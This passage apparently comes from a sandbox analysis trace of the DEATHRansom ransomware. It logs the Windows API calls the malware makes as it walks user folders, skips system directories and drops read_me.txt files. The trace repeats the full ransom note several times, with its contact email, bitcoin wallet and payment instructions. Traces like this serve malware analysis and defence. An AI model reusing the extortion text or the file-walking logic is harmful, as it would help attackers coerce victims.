pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Yb9uhWzjKs-.png") returned 58 [0075.832] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74d454f0, ftCreationTime.dwHighDateTime=0x1d4cf76, ftLastAccessTime.dwLowDateTime=0x23299a60, ftLastAccessTime.dwHighDateTime=0x1d4d251, ftLastWriteTime.dwLowDateTime=0x23299a60, ftLastWriteTime.dwHighDateTime=0x1d4d251, nFileSizeHigh=0x0, nFileSizeLow=0x2ad7, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="yHaWKp5081GLz_kNjZJN.gif", cAlternateFileName="YHAWKP~1.GIF")) returned 1 [0075.832] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\yHaWKp5081GLz_kNjZJN.gif") returned 67 [0075.832] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x519b48d0, ftCreationTime.dwHighDateTime=0x1d4cc9d, ftLastAccessTime.dwLowDateTime=0xf9b635c0, ftLastAccessTime.dwHighDateTime=0x1d4ccfc, ftLastWriteTime.dwLowDateTime=0xf9b635c0, ftLastWriteTime.dwHighDateTime=0x1d4ccfc, nFileSizeHigh=0x0, nFileSizeLow=0x8df6, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="YzAGhTzbIO6_1eDBh3V.bmp", cAlternateFileName="YZAGHT~1.BMP")) returned 1 [0075.832] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YzAGhTzbIO6_1eDBh3V.bmp") returned 66 [0075.832] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf966e070, ftCreationTime.dwHighDateTime=0x1d4d453, ftLastAccessTime.dwLowDateTime=0x4190b900, ftLastAccessTime.dwHighDateTime=0x1d4d07d, ftLastWriteTime.dwLowDateTime=0x4190b900, ftLastWriteTime.dwHighDateTime=0x1d4d07d, nFileSizeHigh=0x0, nFileSizeLow=0x4b85, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="_1BQUTkWpGYxe9Y8c26L.bmp", cAlternateFileName="_1BQUT~1.BMP")) returned 1 [0075.832] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_1BQUTkWpGYxe9Y8c26L.bmp") returned 67 [0075.832] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ca4d5c0, ftCreationTime.dwHighDateTime=0x1d4d4bb, ftLastAccessTime.dwLowDateTime=0xfa90460, ftLastAccessTime.dwHighDateTime=0x1d4c790, ftLastWriteTime.dwLowDateTime=0xfa90460, ftLastWriteTime.dwHighDateTime=0x1d4c790, nFileSizeHigh=0x0, nFileSizeLow=0x88b7, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="_iThV9G.jpg", cAlternateFileName="")) returned 1 [0075.832] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_iThV9G.jpg") returned 54 [0075.832] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ca4d5c0, ftCreationTime.dwHighDateTime=0x1d4d4bb, ftLastAccessTime.dwLowDateTime=0xfa90460, ftLastAccessTime.dwHighDateTime=0x1d4c790, ftLastWriteTime.dwLowDateTime=0xfa90460, ftLastWriteTime.dwHighDateTime=0x1d4c790, nFileSizeHigh=0x0, nFileSizeLow=0x88b7, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="_iThV9G.jpg", cAlternateFileName="")) returned 0 [0075.832] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0075.832] wnsprintfW (in: pszDest=0x8d910d8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\read_me.txt") returned 54 [0075.832] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.832] GetProcessHeap () returned 0x4f10000 [0075.832] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d910d8 | out: hHeap=0x4f10000) returned 1 [0075.832] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0075.832] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood") returned 43 [0075.832] lstrcmpW (lpString1="PrintHood", lpString2="..") returned 1 [0075.832] lstrcmpW (lpString1="PrintHood", lpString2=".") returned 1 [0075.832] StrStrW (lpFirst="printhood", lpSrch="programdata") returned 0x0 [0075.832] StrStrW (lpFirst="printhood", lpSrch="$recycle.bin") returned 0x0 [0075.832] StrStrW (lpFirst="printhood", lpSrch="program files") returned 0x0 [0075.832] StrStrW (lpFirst="printhood", lpSrch="windows") returned 0x0 [0075.832] StrStrW (lpFirst="printhood", lpSrch="all users") returned 0x0 [0075.832] StrStrW (lpFirst="printhood", lpSrch="appdata") returned 0x0 [0075.833] GetProcessHeap () returned 0x4f10000 [0075.833] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d910d8 [0075.833] lstrcpyW (in: lpString1=0x8d910d8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood" [0075.833] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 80 [0075.833] QueueUserWorkItem (Function=0x40a710, Context=0x8d910d8, Flags=0x0) returned 1 [0075.833] GetProcessHeap () returned 0x4f10000 [0075.833] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8da10e0 [0075.834] wnsprintfW (in: pszDest=0x8da10e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*") returned 45 [0075.834] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ca4d5c0, ftCreationTime.dwHighDateTime=0x1d4d4bb, ftLastAccessTime.dwLowDateTime=0xfa90460, ftLastAccessTime.dwHighDateTime=0x1d4c790, ftLastWriteTime.dwLowDateTime=0xfa90460, ftLastWriteTime.dwHighDateTime=0x1d4c790, nFileSizeHigh=0x0, nFileSizeLow=0x88b7, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="_iThV9G.jpg", cAlternateFileName="廠疙휎᥵?\x17甴?\x17a")) returned 0xffffffff [0075.834] wnsprintfW (in: pszDest=0x8da10e0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\read_me.txt") returned 55 [0075.834] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\printhood\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a0 [0075.912] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.912] WriteFile (in: hFile=0x7a0, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.913] CloseHandle (hObject=0x7a0) returned 1 [0075.914] GetProcessHeap () returned 0x4f10000 [0075.914] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8da10e0 | out: hHeap=0x4f10000) returned 1 [0075.914] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Recent", cAlternateFileName="")) returned 1 [0075.914] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent") returned 40 [0075.914] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0075.914] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0075.914] StrStrW (lpFirst="recent", lpSrch="programdata") returned 0x0 [0075.914] StrStrW (lpFirst="recent", lpSrch="$recycle.bin") returned 0x0 [0075.914] StrStrW (lpFirst="recent", lpSrch="program files") returned 0x0 [0075.914] StrStrW (lpFirst="recent", lpSrch="windows") returned 0x0 [0075.914] StrStrW (lpFirst="recent", lpSrch="all users") returned 0x0 [0075.914] StrStrW (lpFirst="recent", lpSrch="appdata") returned 0x0 [0075.914] GetProcessHeap () returned 0x4f10000 [0075.914] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8da10e0 [0075.914] lstrcpyW (in: lpString1=0x8da10e0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent" [0075.914] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 81 [0075.914] QueueUserWorkItem (Function=0x40a710, Context=0x8da10e0, Flags=0x0) returned 1 [0075.914] GetProcessHeap () returned 0x4f10000 [0075.914] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8db10e8 [0075.915] wnsprintfW (in: pszDest=0x8db10e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*") returned 42 [0075.915] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ca4d5c0, ftCreationTime.dwHighDateTime=0x1d4d4bb, ftLastAccessTime.dwLowDateTime=0xfa90460, ftLastAccessTime.dwHighDateTime=0x1d4c790, ftLastWriteTime.dwLowDateTime=0xfa90460, ftLastWriteTime.dwHighDateTime=0x1d4c790, nFileSizeHigh=0x0, nFileSizeLow=0x88b7, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="_iThV9G.jpg", cAlternateFileName="廠疙휎᥵?\x17甴?\x17a")) returned 0xffffffff [0075.916] wnsprintfW (in: pszDest=0x8db10e8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\read_me.txt") returned 52 [0075.916] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a0 [0075.916] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.916] WriteFile (in: hFile=0x7a0, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.917] CloseHandle (hObject=0x7a0) returned 1 [0075.917] GetProcessHeap () returned 0x4f10000 [0075.917] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8db10e8 | out: hHeap=0x4f10000) returned 1 [0075.917] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0075.917] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games") returned 45 [0075.917] lstrcmpW (lpString1="Saved Games", lpString2="..") returned 1 [0075.917] lstrcmpW (lpString1="Saved Games", lpString2=".") returned 1 [0075.917] StrStrW (lpFirst="saved games", lpSrch="programdata") returned 0x0 [0075.918] StrStrW (lpFirst="saved games", lpSrch="$recycle.bin") returned 0x0 [0075.918] StrStrW (lpFirst="saved games", lpSrch="program files") returned 0x0 [0075.918] StrStrW (lpFirst="saved games", lpSrch="windows") returned 0x0 [0075.918] StrStrW (lpFirst="saved games", lpSrch="all users") returned 0x0 [0075.918] StrStrW (lpFirst="saved games", lpSrch="appdata") returned 0x0 [0075.918] GetProcessHeap () returned 0x4f10000 [0075.918] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8db10e8 [0075.918] lstrcpyW (in: lpString1=0x8db10e8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" [0075.918] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 82 [0075.918] QueueUserWorkItem (Function=0x40a710, Context=0x8db10e8, Flags=0x0) returned 1 [0075.918] GetProcessHeap () returned 0x4f10000 [0075.918] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8dc10f0 [0075.919] wnsprintfW (in: pszDest=0x8dc10f0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*") returned 47 [0075.919] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0075.919] wnsprintfW (in: pszDest=0x8dc10f0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\.") returned 47 [0075.919] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.919] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.919] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.919] wnsprintfW (in: pszDest=0x8dc10f0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\..") returned 48 [0075.919] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.919] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0075.919] wnsprintfW (in: pszDest=0x8dc10f0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned 57 [0075.919] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0075.919] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0075.920] wnsprintfW (in: pszDest=0x8dc10f0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\read_me.txt") returned 57 [0075.920] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a0 [0075.923] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.923] WriteFile (in: hFile=0x7a0, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.924] CloseHandle (hObject=0x7a0) returned 1 [0075.924] GetProcessHeap () returned 0x4f10000 [0075.924] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8dc10f0 | out: hHeap=0x4f10000) returned 1 [0075.924] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Searches", cAlternateFileName="")) returned 1 [0075.924] wnsprintfW (in: 